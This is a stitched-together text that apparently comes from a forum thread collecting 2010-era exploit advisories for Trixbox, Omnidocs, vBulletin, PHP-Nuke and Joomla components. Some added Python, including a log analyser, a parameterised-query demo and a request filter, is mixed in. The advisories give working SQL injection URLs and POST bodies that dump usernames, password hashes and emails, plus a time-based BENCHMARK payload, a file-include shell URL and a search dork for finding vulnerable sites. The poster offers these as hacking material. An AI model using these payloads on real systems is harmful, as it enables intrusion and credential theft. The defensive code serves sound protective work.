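        m = LOG_RE.match(line)
        if not m:
            continue
        _, _, query = m.group("target").partition("?")
        # parse_qsl turns '+' into spaces and decodes %3E into '>'.
        params = parse_qsl(query, keep_blank_values=True)
        component = dict(params).get("option", "")
        for name, value in params:
            key = (m.group("client"), component, name)
            probe = PROBE_RE.search(value)
            if probe:
                target = (probe.group("table") + "." + probe.group("column")).lower()
                sessions[key]["probes"] += 1
                sessions[key]["positions"][target].add(int(probe.group("pos")))
            elif CALIBRATION_RE.search(value):
                sessions[key]["calibration"] += 1

    report = []
    for (client, component, param), seen in sessions.items():
        if seen["probes"] < min_probes:
            continue
        report.append({
            "client": client,
            "component": component,
            "param": param,  # the parameter that needs fixing
            "probes": seen["probes"],
            "calibration": seen["calibration"],
            # highest character position requested per table.column
            "chars_reached": {t: max(p) for t, p in seen["positions"].items()},
        })
    return report


if __name__ == "__main__":
    for entry in summarize_blind_sqli(SAMPLE_LOG):
        print(entry)
```

The `chars_reached` figure gives an upper bound on how much of each column the client could have read, which is what decides whether the affected accounts need their passwords reset.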

Trixbox 2.2.4 PhonecDirectory.php SQL Injection

Security Reason




Topic : Trixbox 2.2.4 PhonecDirectory.php SQL Injection

SecurityAlert : 7053
CVE : CVE-2010-0702
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : NorSlacker
Published : 28.02.2010

Affected Software : fonality:trixbox:2.2.4

Advisory Content :

# Exploit Title: Trixbox PhonecDirectory.php SQL Injection
# Date: 18.02.2010
# Author: NorSlacker
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://trixbox/cisco/services/PhoneDirectory.php?ID=1 [sql INJECTION]

Example (Grab users / password hashes from sugarcrm)
http://trixbox/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id


PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";

# $ID comes straight from the request and is pasted between the quotes
$Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID' ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);

...

}

#norslacker [at] gmail [dot] com



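The query construction from the advisory's PhoneDirectory.php excerpt, next to a bound-parameter form, as an added example that is not from the advisory or from Trixbox. It is modelled in Python with an in-memory SQLite database instead of PHP and MySQL; the table contents, the crafted value and the id format check are constructed assumptions.

```python
import re
import sqlite3

COLUMNS = ("id, first_name, last_name, phone_home, phone_work, "
           "phone_mobile, phone_other")

# Assumed id format (record ids of up to 36 letters, digits and dashes).
ID_RE = re.compile(r"[0-9A-Za-z-]{1,36}")

# Constructed input with the shape of the advisory's example value.
CRAFTED_ID = ("x' UNION SELECT id, user_hash, last_name, phone_home, user_name, "
              "user_hash, phone_other FROM users WHERE '1'='1")


def make_db():
    """In-memory stand-in for the contacts and users tables named in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE contacts (id TEXT, first_name TEXT, last_name TEXT,
            phone_home TEXT, phone_work TEXT, phone_mobile TEXT, phone_other TEXT);
        CREATE TABLE users (id TEXT, user_name TEXT, user_hash TEXT,
            last_name TEXT, phone_home TEXT, phone_other TEXT);
        INSERT INTO contacts VALUES ('1', 'Ada', 'Example', '555-0100',
            '555-0101', '555-0102', '555-0103');
        INSERT INTO users VALUES ('u1', 'admin', 'CONSTRUCTED-HASH', 'Root',
            '555-0199', '555-0198');
    """)
    return conn


def lookup_concatenated(conn, contact_id):
    # Same construction as the excerpt: the request value is pasted between
    # the quotes, so a quote inside the value ends the string literal and the
    # rest of the value is parsed as SQL.
    query = ("SELECT " + COLUMNS + " FROM contacts WHERE id = '"
             + contact_id + "' ORDER BY last_name")
    return conn.execute(query).fetchall()


def lookup_bound(conn, contact_id, validate=True):
    # The value travels separately from the statement text, so it can only
    # ever be compared with the id column, whatever characters it contains.
    if validate and not ID_RE.fullmatch(contact_id):
        raise ValueError("contact id has an unexpected format")
    query = "SELECT " + COLUMNS + " FROM contacts WHERE id = ? ORDER BY last_name"
    return conn.execute(query, (contact_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, CRAFTED_ID))
    print("bound       :", lookup_bound(db, CRAFTED_ID, validate=False))
```

In the PHP original the equivalent change is a prepared statement (PDO or mysqli) in place of `mysql_query` on a concatenated string.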

Omnidocs SQL injection Vulnerability

Security Reason



Topic : Omnidocs SQL injection Vulnerability

SecurityAlert : 7051
CVE : CVE-2010-0701
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : thebluegenius
Published : 28.02.2010

Affected Software : newgensoft:omnidocs

Advisory Content :

--------------------------------------------------------------------
# Exploit Title: Omnidocs SQL injection Vulnerability
# Date: 10 Feb 2010
# Author: thebluegenius
# Software Link: http://www.newgensoft.com/omnidocs.asp
# Version: All
# Tested on: Apache-Coyote/1.1 | JBoss
# CVE : NA

---------------------------------------------------
"Omnidocs" SQL injection vulnerability.
---------------------------------------------------
By :Thebluegenius.
Email :rajsm@isac.org.in
Blog :thebluegenius.com.
---------------------------------------------------

Description:
OmniDocs is an Enterprise Document Management (EDM) platform for creating,
capturing, managing, delivering and archiving large volumes of documents
and contents. Also integrates seamlessly with other enterprise
applications.

------------------
Vulnerability
------------------

Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp

Command: ' or 'a' = 'a'
Confirmed SQL Injection error : ORA-00907: missing right parenthesis


Command: or exists (select 1 from sys.dual) and ''x''=''x'
Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked() : My good friend
2] Aodrulez : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in

This is the last one. If I come across any more, I'll post them. It's much better if you hit thanks; that way I know I'm doing this right.

Source: ashiyane.org


vBulletin Version 3.8.4 File Include Vulnerability

Security Reason

Topic : vBulletin Version 3.8.4 File Include Vulnerability
WLB : WLB-2010030006
SecurityAlert : None
Date : 2010-03-02
Credit : EjRaMHaCKeR
Added by : EjRaMHaCKeR
SecurityRisk : Low
Remote : Yes
Local : No
Status : Bogus
History : [2010-03-02] Started
Affected software : vBulletin Version 3.8.4

Text :

======= 

################################## 
# Script: vBulletin Version 3.8.4 File Include Vulnerability 

#Language: $php$ 

#Author : $EjRaM-HaCKeR$ 

#My home : [ www.sec-center.com ] 

#Greetz to : [Dr.eXe ,moroccoHaCkEr, All My Friends 
# $ EgyptHaCkeR ] 

# mail : m2z@9.cn $ tsv@hotmail.com 
################################# 

############# ===[ Exploits ]=== ########### 
# 1- 
http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI] 
# 2- 
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt? 
######################## 




$EjRaM-HaCKeR$  


PhP-Nuke user.php SQL Injection

----------------------------Information------------------------------------------------ 
+Name : PhP-Nuke user.php SQL Injection 
+Author : Easy Laster
+Date   : 04.03.2010
+Script  : PhP-Nuke
+Download : it's an old version http://phpnuke.org/
+Price : 12,00$ 
+Language :PHP 
+Discovered by Easy Laster 
+Security Group 4004-Security-Project 
+Greetz to Team-Internet ,Underground Agents 
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, 
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, 
N00bor,novaca!ne. 

--------------------------------------------------------------------------------------- 

___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _| 
 |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                             |___|                 |___|            


---------------------------------------------------------------------------------------- 
+Vulnerability : http://www.site.com/phpnuke/user.php?op=userinfo&uname= 
+Exploitable   : http://www.site.com/phpnuke/user.php?op=userinfo&uname='+union+select 
+1,2,version(),4,5,6,7,8,9,10,11,12,13--+ 
-----------------------------------------------------------------------------------------  

Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability

============================================================================== 
Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability ///////// 
============================================================================== 

*************************************************************************** 
Dork = inurl:com_products "intCategoryId" 
########################################################################### 
===[ Exploit ]=== 

=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details 
or 
=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details  

Here's the first batch



These bugs relate to old versions of Joomla (mosconfig belongs to Joomla 1, and legacy to Joomla 1.5).

When posting one, please also state the exact Joomla version involved.

Please also cite the source for each item.


Posted (edited)


Hello

I said at the start of the topic (they can't be separated; it's all mixed together)

There are a lot of Joomla bugs, and many of them have been fixed in the new 25, which I tested myself

I'm posting them from version 1 up to .....

Whatever I post, whether I made it myself or copied it, is from the Ashiyane site, because that site is my teacher for hacking and it's excellent

Edited by spyman


Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities



Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection
Vulnerabilities

Name               Teams
Vendor             http://www.joomlamo.com
Versions Affected  1_1028_100809_1711

Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-08-10

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX


I. ABOUT THE APPLICATION
________________________

Teams is a base application for entering leagues, teams,
players, uniforms, and games.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary:

A) Multiple Blind SQL Injection


A) Multiple Blind SQL Injection
_______________________________

Many parameters are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205

FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1
&Active=Y&cid[]=&PlayerID=-1 OR
(SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task
=save&controller=player


V. FIX
______

No fix.
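
A defensive counterpart to the advisories collected in this thread, added here as an example (it is not part of any post and not code from Joomla or the affected components): a request filter that rejects any client-supplied `mosConfig_*` variable and any non-integer value in the ID parameters named above (`intCategoryId`, `PlayerID`). The function names and the sample requests are constructed for illustration; the filter assumes these parameters are plain integers in legitimate traffic.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# ID parameters that the advisories above show reaching SQL unvalidated.
INT_PARAMS = {"intCategoryId", "PlayerID"}
# Mambo/Joomla 1.0 configuration globals; no legitimate request sets them.
CONFIG_PREFIX = "mosConfig_"
INT_RE = re.compile(r"-?\d{1,10}")


def php_name(name):
    """Normalise a parameter name the way PHP does before it becomes a variable:
    leading spaces dropped, 'a[0]' keyed as 'a', '.' and ' ' turned into '_'."""
    return re.sub(r"[. ]", "_", name.lstrip().split("[", 1)[0])


def check_request(url, body=""):
    """Return (parameter, reason) findings for one request.

    url  -- request target including the query string
    body -- application/x-www-form-urlencoded POST body, if any
    """
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    findings = []
    for raw_name, value in pairs:
        name = php_name(raw_name)
        if name.startswith(CONFIG_PREFIX):
            findings.append((name, "configuration variable set by client"))
        elif name in INT_PARAMS and not INT_RE.fullmatch(value):
            findings.append((name, "non-integer value in ID parameter"))
    return findings


# Constructed sample requests; parameter names and values are taken from the posts above.
SAMPLES = [
    ("/index.php?option=com_products&intCategoryId=12&op=category_details", ""),
    ("/index.php?option=com_products&intCategoryId=-222%20UnIon%20SelEct%201,2&op=category_details", ""),
    ("/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell", ""),
    ("/index.php", "FirstName=mario&PlayerID=-1&option=com_teams&task=save&controller=player"),
    ("/index.php", "FirstName=mario&PlayerID=-1+OR+(SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url.split("?")[0], check_request(url, body) or "ok")
```

The integer check is an allow-list, so it does not need to recognise SQL keywords or timing functions; anything that is not a bare integer is refused before it can reach a query.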

